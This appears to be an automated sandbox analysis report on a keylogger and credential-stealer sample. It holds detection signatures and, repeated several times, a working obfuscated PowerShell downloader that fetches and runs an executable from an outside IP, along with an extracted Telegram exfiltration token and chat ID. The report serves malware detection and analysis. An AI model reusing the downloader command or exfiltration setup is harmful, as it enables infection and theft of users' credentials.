11.2.daphpvwO.pif.29240000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1bcd1:$a1: get_encryptedPassword 0x1bca5:$a2: get_encryptedUsername 0x1bd69:$a3: get_timePasswordChanged 0x1bc81:$a4: get_passwordField 0x1bce7:$a5: set_encryptedPassword 0x1bab4:$a7: get_logins 0x1b03e:$a8: GetOutlookPasswords 0x1a567:$a9: StartKeylogger 0x18f9f:$a10: KeyLoggerEventArgs 0x18f6e:$a11: KeyLoggerEventArgsEventHandler 0x1bb88:$a13: _encryptedPassword
11.2.daphpvwO.pif.29240000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x204af:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f9ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x1fcbb:$a4: \Orbitum\User Data\Default\Login Data 0x20ab3:$a5: \Kometa\User Data\Default\Login Data
Click to see the 118 entries

Other

Source	Rule	Description	Author	Strings
amsi32_1956.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\vcc.exe, ProcessId: 3616, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgI

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1956, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline", ProcessId: 5200, ProcessName: csc.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\\Users\\user\\Links\daphpvwO.pif, CommandLine: C:\\Users\\user\\Links\daphpvwO.pif, CommandLine|base64offset|contains: , Image: C:\Users\user\Links\daphpvwO.pif, NewProcessName: C:\Users\user\Links\daphpvwO.pif, OriginalFileName: C:\Users\user\Links\daphpvwO.pif, ParentCommandLine: "C:\Users\user\AppData\Roaming\vcc.exe" , ParentImage: C:\Users\user\AppData\Roaming\vcc.exe, ParentProcessId: 3616, ParentProcessName: vcc.exe, ProcessCommandLine: C:\\Users\\user\\Links\daphpvwO.pif, ProcessId: 3320, ProcessName: daphpvwO.pif

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1956, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcc[1].exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1956, TargetFilename: C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))", CommandLine: POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1956, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline", ProcessId: 5200, ProcessName: csc.exe

Suricata Signatures

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T21:36:33.610553+0100	2022050	1	A Network Trojan was detected	192.227.228.22	80	192.168.2.11	49704	TCP

ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T21:36:33.697236+0100	2022051	1	A Network Trojan was detected	192.227.228.22	80	192.168.2.11	49704	TCP

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T21:36:57.772821+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.11	49712	149.154.167.220	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T21:36:33.605623+0100	2019714	2	Potentially Bad Traffic	192.168.2.11	49704	192.227.228.22	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T21:36:45.378987+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49705	158.101.44.242	80	TCP
2025-03-10T21:36:55.207090+0100	2803274	2	Potentially Bad Traffic	192.168.2.11	49705	158.101.44.242	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T21:36:57.196560+0100	1810008	1	Potentially Bad Traffic	192.168.2.11	49712	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\vcc.exe	Avira: detection malicious, Label: HEUR/AGEN.1326043
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcc[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1326043

Found malware configuration

Source: 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU", "Telegram Chatid": "403948698"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcc[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\vcc.exe	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: niceworkingskilldevelopedwithgreatnews.hta	Virustotal: Detection: 34%			Perma Link
Source: niceworkingskilldevelopedwithgreatnews.hta	ReversingLabs: Detection: 23%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Links\daphpvwO.pif

Unpacked PE file: 11.2.daphpvwO.pif.400000.0.unpack

Source: unknown

HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.11:49706 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49712 version: TLS 1.2

Source:	Binary string: easinvoker.pdb source: vcc.exe, 00000006.00000002.1498618356.0000000020599000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000003.1461293441.000000007F320000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1498618356.0000000020570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: daphpvwO.pif, 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: q7C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.pdb source: powershell.exe, 00000003.00000002.1492553926.00000000050D3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: vcc.exe, 00000006.00000003.1461924520.0000000000749000.00000004.00000020.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1498618356.0000000020599000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000003.1461924520.0000000000778000.00000004.00000020.00020000.00000000.sdmp, vcc.exe, 00000006.00000003.1461293441.000000007F320000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1498618356.0000000020570000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\vcc.exe

Code function: 6_2_028852F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

6_2_028852F8

Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	11_2_28F9DE70
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C03490Fh	11_2_2C0344F0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C0341B9h	11_2_2C033F08
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C03F059h	11_2_2C03EDB0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C03F909h	11_2_2C03F660
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C03490Fh	11_2_2C03483C
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C03EC01h	11_2_2C03E958
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C03F4B1h	11_2_2C03F208
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C03FD61h	11_2_2C03FAB8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBC028h	11_2_2CBBBD80
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBB037Dh	11_2_2CBB0040
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBB778h	11_2_2CBBB4D0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBAEC8h	11_2_2CBBAC20
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBD718h	11_2_2CBBD470
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBB9060h	11_2_2CBB8DB8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBE878h	11_2_2CBBE5D0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBDFC8h	11_2_2CBBDD20
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBF128h	11_2_2CBBEE80
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBB2190h	11_2_2CBB1EE8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBB18E0h	11_2_2CBB1638
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBB0EC2h	11_2_2CBB0E18
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBB0EC2h	11_2_2CBB0E10
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBB9910h	11_2_2CBB9668
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBB2A40h	11_2_2CBB2798
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBAA70h	11_2_2CBBA7C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBA1C0h	11_2_2CBB9F18
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBCA10h	11_2_2CBBC768
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBDB70h	11_2_2CBBD8C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBD2C0h	11_2_2CBBD018
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBB320h	11_2_2CBBB078
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBC482h	11_2_2CBBC1D8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBBBD0h	11_2_2CBBB928
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBE420h	11_2_2CBBE178
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBB8C08h	11_2_2CBB8960
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBB1D38h	11_2_2CBB1A90
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBB9D68h	11_2_2CBB9AC0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBECD0h	11_2_2CBBEA28
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBB94B8h	11_2_2CBB9210
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBB2E98h	11_2_2CBB2BF0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBCE68h	11_2_2CBBCBC0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBBA618h	11_2_2CBBA370
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CBB25E8h	11_2_2CBB2340
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CC40D0Dh	11_2_2CC40B30
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2CC41697h	11_2_2CC40B30
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then push 00000000h	11_2_2CC44040
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	11_2_2CC4F7B0
